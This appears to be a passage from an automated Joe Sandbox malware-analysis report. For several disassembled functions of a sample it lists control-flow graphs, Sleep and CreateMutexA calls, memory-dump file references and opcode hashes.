                                                                                                      • Associated: 00000000.00000002.1887786083.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887823253.0000000001129000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: a67f787d494f4a7fd592f091f35d68f3f0889f06cfb5fe6928dfd63259bfd7f3
                                                                                                      • Instruction ID: aab3aec82cde6f16fc0bb9fe1381c3e39543632ba1198ee0dd8752b7fc04f43c
                                                                                                      • Opcode Fuzzy Hash: a67f787d494f4a7fd592f091f35d68f3f0889f06cfb5fe6928dfd63259bfd7f3
                                                                                                      • Instruction Fuzzy Hash: DF3169717012009BEB08DB78ED8D7ECFBA2EB86310F289618E465B73D2D7B589C08751
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00E19EE8 Relevance: 3.1, APIs: 2, Instructions: 124sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 793 e19ee8-e19f08 797 e19f36-e19f52 793->797 798 e19f0a-e19f16 793->798 801 e19f80-e19f9f 797->801 802 e19f54-e19f60 797->802 799 e19f18-e19f26 798->799 800 e19f2c-e19f33 call e2ecf8 798->800 799->800 807 e1a40f 799->807 800->797 805 e19fa1-e19fad 801->805 806 e19fcd-e1a3e6 call e29750 801->806 803 e19f62-e19f70 802->803 804 e19f76-e19f7d call e2ecf8 802->804 803->804 803->807 804->801 810 e19fc3-e19fca call e2ecf8 805->810 811 e19faf-e19fbd 805->811 813 e1a414-e1a466 call e482fa * 3 Sleep CreateMutexA 807->813 814 e1a40f call e482fa 807->814 810->806 811->807 811->810 814->813
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00E1A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,00E751D8), ref: 00E1A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1885216427.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885241101.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885371883.0000000000E79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885410128.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885438373.0000000000E87000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886119092.0000000000FD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886156330.0000000000FD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886289577.0000000001014000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886326423.0000000001016000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886355276.0000000001029000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886390792.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886430986.0000000001032000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886469194.000000000103D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886513828.0000000001052000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886550731.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886591341.000000000105E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886631945.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886671373.0000000001067000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886709527.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886752961.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886888194.000000000107B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886933792.0000000001088000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887009956.000000000108D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887062815.000000000108E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887100518.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887139267.0000000001092000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887178042.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887222344.00000000010AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887259907.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887296727.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887336233.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887394735.00000000010D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887514236.00000000010F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887552899.00000000010FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887591736.000000000110F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887630778.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887668666.0000000001112000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887707800.0000000001118000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887744948.000000000111A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887786083.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887823253.0000000001129000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: ee05d83291d170039d78470d9d652a7423702de914e85de8030bac8f888c17c7
                                                                                                      • Instruction ID: 13f09cce170604acbd8c9feadb36b84ab25c9cc74ac8caad36586f012f1ec3c1
                                                                                                      • Opcode Fuzzy Hash: ee05d83291d170039d78470d9d652a7423702de914e85de8030bac8f888c17c7
                                                                                                      • Instruction Fuzzy Hash: B6318D317011009BEB08DB78DD897FCB762EB8A310F24A218E125F77D6C7B549C18761
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00E1A01D Relevance: 3.1, APIs: 2, Instructions: 123sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 830 e1a01d-e1a03d 834 e1a06b-e1a087 830->834 835 e1a03f-e1a04b 830->835 836 e1a0b5-e1a0d4 834->836 837 e1a089-e1a095 834->837 838 e1a061-e1a068 call e2ecf8 835->838 839 e1a04d-e1a05b 835->839 842 e1a102-e1a3e6 call e29750 836->842 843 e1a0d6-e1a0e2 836->843 840 e1a097-e1a0a5 837->840 841 e1a0ab-e1a0b2 call e2ecf8 837->841 838->834 839->838 844 e1a414-e1a466 call e482fa * 3 Sleep CreateMutexA 839->844 840->841 840->844 841->836 849 e1a0e4-e1a0f2 843->849 850 e1a0f8-e1a0ff call e2ecf8 843->850 849->844 849->850 850->842
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00E1A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,00E751D8), ref: 00E1A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1885216427.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885241101.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885371883.0000000000E79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885410128.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885438373.0000000000E87000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886119092.0000000000FD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886156330.0000000000FD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886289577.0000000001014000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886326423.0000000001016000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886355276.0000000001029000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886390792.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886430986.0000000001032000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886469194.000000000103D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886513828.0000000001052000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886550731.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886591341.000000000105E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886631945.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886671373.0000000001067000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886709527.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886752961.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886888194.000000000107B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886933792.0000000001088000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887009956.000000000108D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887062815.000000000108E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887100518.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887139267.0000000001092000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887178042.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887222344.00000000010AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887259907.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887296727.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887336233.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887394735.00000000010D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887514236.00000000010F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887552899.00000000010FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887591736.000000000110F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887630778.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887668666.0000000001112000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887707800.0000000001118000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887744948.000000000111A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887786083.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887823253.0000000001129000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: a5d6e883120590e544391db7ef6e66541910698d5afce046a7d942b4265f3f74
                                                                                                      • Instruction ID: 8e84041b3fdfe69e573e2353450e42bd61a098f0a1e153442b6c3cb3cd2a1032
                                                                                                      • Opcode Fuzzy Hash: a5d6e883120590e544391db7ef6e66541910698d5afce046a7d942b4265f3f74
                                                                                                      • Instruction Fuzzy Hash: 45316B717026009BEB08DB78DD897FDB662EF8A314F289228E425B77D2C77559C08762
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00E1A152 Relevance: 3.1, APIs: 2, Instructions: 122sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 865 e1a152-e1a172 869 e1a1a0-e1a1bc 865->869 870 e1a174-e1a180 865->870 871 e1a1ea-e1a209 869->871 872 e1a1be-e1a1ca 869->872 873 e1a182-e1a190 870->873 874 e1a196-e1a19d call e2ecf8 870->874 877 e1a237-e1a3e6 call e29750 871->877 878 e1a20b-e1a217 871->878 875 e1a1e0-e1a1e7 call e2ecf8 872->875 876 e1a1cc-e1a1da 872->876 873->874 879 e1a419-e1a466 call e482fa * 2 Sleep CreateMutexA 873->879 874->869 875->871 876->875 876->879 883 e1a219-e1a227 878->883 884 e1a22d-e1a234 call e2ecf8 878->884 883->879 883->884 884->877
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00E1A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,00E751D8), ref: 00E1A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1885216427.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885241101.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885371883.0000000000E79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885410128.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885438373.0000000000E87000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886119092.0000000000FD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886156330.0000000000FD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886289577.0000000001014000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886326423.0000000001016000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886355276.0000000001029000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886390792.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886430986.0000000001032000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886469194.000000000103D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886513828.0000000001052000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886550731.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886591341.000000000105E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886631945.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886671373.0000000001067000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886709527.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886752961.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886888194.000000000107B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886933792.0000000001088000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887009956.000000000108D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887062815.000000000108E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887100518.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887139267.0000000001092000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887178042.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887222344.00000000010AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887259907.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887296727.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887336233.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887394735.00000000010D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887514236.00000000010F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887552899.00000000010FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887591736.000000000110F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887630778.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887668666.0000000001112000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887707800.0000000001118000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887744948.000000000111A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887786083.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887823253.0000000001129000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 2ee021fa94046ca53de3755798767c3fd7f957435d2763a8ca03c8a09ff278e9
                                                                                                      • Instruction ID: 85732a8b8c526edef7738754be85d679356268b90fc621cdbd29eef8555ec6e3
                                                                                                      • Opcode Fuzzy Hash: 2ee021fa94046ca53de3755798767c3fd7f957435d2763a8ca03c8a09ff278e9
                                                                                                      • Instruction Fuzzy Hash: 3A314B717021409BEB08DB68DC897FDB762EB86314F289228E425B77E2C77559C0C762
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00E19E1F Relevance: 3.1, APIs: 2, Instructions: 91sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 898 e19e1f-e19e2b 899 e19e41-e19e6a call e2ecf8 898->899 900 e19e2d-e19e3b 898->900 906 e19e98-e1a3e6 call e29750 899->906 907 e19e6c-e19e78 899->907 900->899 901 e1a40a 900->901 903 e1a423-e1a466 Sleep CreateMutexA 901->903 904 e1a40a call e482fa 901->904 904->903 908 e19e7a-e19e88 907->908 909 e19e8e-e19e95 call e2ecf8 907->909 908->901 908->909 909->906
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00E1A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,00E751D8), ref: 00E1A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1885216427.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885241101.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885371883.0000000000E79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885410128.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885438373.0000000000E87000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886119092.0000000000FD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886156330.0000000000FD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886289577.0000000001014000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886326423.0000000001016000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886355276.0000000001029000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886390792.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886430986.0000000001032000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886469194.000000000103D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886513828.0000000001052000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886550731.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886591341.000000000105E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886631945.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886671373.0000000001067000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886709527.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886752961.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886888194.000000000107B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886933792.0000000001088000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887009956.000000000108D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887062815.000000000108E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887100518.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887139267.0000000001092000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887178042.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887222344.00000000010AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887259907.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887296727.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887336233.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887394735.00000000010D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887514236.00000000010F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887552899.00000000010FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887591736.000000000110F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887630778.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887668666.0000000001112000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887707800.0000000001118000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887744948.000000000111A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887786083.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887823253.0000000001129000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
